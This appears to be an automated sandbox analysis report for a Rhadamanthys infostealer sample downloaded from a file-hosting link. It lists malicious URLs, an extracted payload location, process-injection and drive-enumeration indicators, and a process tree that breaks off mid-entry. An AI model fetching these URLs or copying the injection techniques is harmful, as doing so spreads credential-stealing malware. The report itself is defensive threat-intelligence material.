Analysis
-
max time kernel
294s -
max time network
294s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
11/02/2024, 08:42
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.up-4ever.net/f81xcrmamr72
Resource
win10-20231215-en
General
-
Target
https://www.up-4ever.net/f81xcrmamr72
Malware Config
Extracted
http://good2-led.com/dark4.bs64
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4288 created 3084 4288 explorer.exe 44 -
Blocklisted process makes network request 4 IoCs
flow pid Process 196 1964 powershell.exe 197 1964 powershell.exe 210 1640 powershell.exe 211 1640 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 1604 gnupg.exe 2456 svchost.exe -
Loads dropped DLL 15 IoCs
pid Process 952 MsiExec.exe 952 MsiExec.exe 952 MsiExec.exe 3852 MsiExec.exe 3852 MsiExec.exe 3852 MsiExec.exe 3852 MsiExec.exe 3852 MsiExec.exe 3852 MsiExec.exe 3852 MsiExec.exe 1604 gnupg.exe 1604 gnupg.exe 1604 gnupg.exe 1604 gnupg.exe 1604 gnupg.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: setup.exe File opened (read-only) \??\U: setup.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: setup.exe File opened (read-only) \??\K: setup.exe File opened (read-only) \??\P: setup.exe File opened (read-only) \??\W: setup.exe File opened (read-only) \??\Y: setup.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\A: setup.exe File opened (read-only) \??\B: setup.exe File opened (read-only) \??\X: setup.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\M: setup.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\T: setup.exe File opened (read-only) \??\Z: setup.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: setup.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: setup.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: setup.exe File opened (read-only) \??\R: setup.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\H: setup.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: setup.exe File opened (read-only) \??\Q: setup.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: setup.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\O: setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 90 drive.google.com 91 drive.google.com 92 drive.google.com -
Drops file in System32 directory 11 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1604 set thread context of 4288 1604 gnupg.exe 121 -
Drops file in Windows directory 16 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIC881.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID8B5.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe File opened for modification C:\Windows\Installer\MSIC98C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC9BC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICA79.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{5DB33E67-8118-4AE0-A414-6B7A0AC6AB7A} msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\e5ac808.msi msiexec.exe File created C:\Windows\Installer\e5ac804.msi msiexec.exe File opened for modification C:\Windows\Installer\e5ac804.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSICA3A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICB17.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID74D.tmp msiexec.exe -
Program crash 3 IoCs
pid pid_target Process procid_target 1592 4288 WerFault.exe 121 504 4288 WerFault.exe 121 4364 4288 WerFault.exe 121 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133521145605244619" chrome.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache PaintStudio.View.exe Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content PaintStudio.View.exe Set value (str) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" PaintStudio.View.exe Set value (int) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" PaintStudio.View.exe Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History PaintStudio.View.exe Set value (str) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" PaintStudio.View.exe Set value (int) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" PaintStudio.View.exe Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache PaintStudio.View.exe Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings PaintStudio.View.exe Set value (str) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix PaintStudio.View.exe Set value (int) \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "51200" PaintStudio.View.exe Key created \REGISTRY\USER\S-1-5-21-655921741-723621465-1580683668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.mspaint_8wekyb3d8bbwe\Internet Settings\Cache\Cookies PaintStudio.View.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3836 PaintStudio.View.exe -
Suspicious behavior: EnumeratesProcesses 56 IoCs
pid Process 204 chrome.exe 204 chrome.exe 4980 chrome.exe 4980 chrome.exe 5072 mspaint.exe 5072 mspaint.exe 3008 mspaint.exe 3008 mspaint.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 3608 msiexec.exe 3608 msiexec.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 1640 powershell.exe 4288 explorer.exe 4288 explorer.exe 3040 dialer.exe 3040 dialer.exe 3040 dialer.exe 3040 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2456 svchost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe Token: SeShutdownPrivilege 204 chrome.exe Token: SeCreatePagefilePrivilege 204 chrome.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 4272 setup.exe 708 msiexec.exe 708 msiexec.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe 204 chrome.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 5072 mspaint.exe 3008 mspaint.exe 3836 PaintStudio.View.exe 3836 PaintStudio.View.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 204 wrote to memory of 292 204 chrome.exe 15 PID 204 wrote to memory of 292 204 chrome.exe 15 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 4180 204 chrome.exe 26 PID 204 wrote to memory of 3000 204 chrome.exe 25 PID 204 wrote to memory of 3000 204 chrome.exe 25 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24 PID 204 wrote to memory of 1920 204 chrome.exe 24
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.up-4ever.net/f81xcrmamr721⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff86f979758,0x7ff86f979768,0x7ff86f9797782⤵PID:292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2864 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:12⤵PID:4436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2860 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:12⤵PID:4608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2036 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:82⤵PID:1920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:82⤵PID:3000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1516 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:22⤵PID:4180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4640 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:12⤵PID:4620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4844 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:12⤵PID:1680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5240 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:82⤵PID:708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:82⤵PID:4792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5356 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:12⤵PID:2348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5836 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:12⤵PID:1528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3796 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:12⤵PID:4496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4952 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:12⤵PID:4112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=768 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:12⤵PID:1428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4948 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:82⤵PID:3188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:82⤵PID:3780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2904 --field-trial-handle=1712,i,7926652338107441766,8715071009090543284,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4980
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:3852
-
c:\windows\system32\sihost.exesihost.exe1⤵PID:3084
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3040
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2744
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\your_files\password.jpg" /ForceBootstrapPaint3D1⤵
- Suspicious behavior: EnumeratesProcesses
